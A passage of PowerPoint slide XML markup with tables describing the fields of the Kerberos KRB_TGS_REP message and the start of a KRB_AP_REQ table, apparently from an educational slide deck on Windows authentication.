                        </a:rPr>
                        <a:t>31</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Only used with postdated tickets. Not supported in Windows 2000, but supported in Windows Server 2003.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5716" marR="5716" marT="5716" marB="0"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00690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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KRB_TGS_REP message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="コンテンツ プレースホルダー 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379322" cy="4174032"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1545000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6834322">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="7128" marR="7128" marT="7128" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">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00"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Protocol Version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="7128" marR="7128" marT="7128" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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01"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Message Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KRB_TGS_REP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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02"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Pre-authentication Data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In a KRB_TGS_REP message, application-specific data might be placed here.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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03"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Realm or domain of the requester.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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04"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Name of the requester</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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05"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="190926">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The encrypted ticket is placed here. For the KRB_TGS_REP message, this will be the service ticket encrypted with the target server's secret key.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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06"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Key</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This is the session key the user will use with the application server.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284402">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Last Requested</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The last time a ticket was requested. This is similar to a "last logged on" time. This can be used to track how frequently a client is requesting tickets. A Kerberos policy can be set that limits how frequently ticket requests can be made. Such limits can help prevent brute force attacks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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08"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nonce</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The nonce from the KRB_TGS_REQ nonce field will be copied here.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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09"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Key Expiration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) When the user's key will expire. This is used for password aging.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="190926">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flags</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>These are the flags set in the ticket, based on the flags requested in the KRB_TGS_REQ message and on the domain's Kerberos policy.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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11"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authentication Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The time the ticket was issued.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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12"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) At what time the ticket is valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>End Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>At what time the ticket expires (although it can be renewed if the ticket is renewable).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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14"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Renew Till</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) At what time the ticket absolutely expires (cannot be renewed past this time).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requested server's realm (domain).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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16"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="97451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requested server's name.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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17"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284402">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Addresses</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Addresses from which the ticket will be valid. If a ticket is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>proxied</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> or forwarded, it will be used on the client's behalf from another address (or perhaps several addresses). These addresses will also be included in this field.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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18"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="正方形/長方形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300664" y="2629199"/>
            <a:ext cx="1479584" cy="2805805"/>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四角形吹き出し 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1719288" y="5641389"/>
            <a:ext cx="3050697" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58451"/>
              <a:gd name="adj2" fmla="val -136662"/>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400" dirty="0">
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>encrypted with a TGS session key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176528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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KRB_AP_REQ message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="コンテンツ プレースホルダー 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379322" cy="2640050"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1994580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6384742">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="25718" marB="25718"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="25718" marB="25718"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="197424">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Protocol Version</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Message Type</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KRB_AP_REQ</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="560155">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Use Session Key</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="25718" marR="25718" marT="57864" marB="57864"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
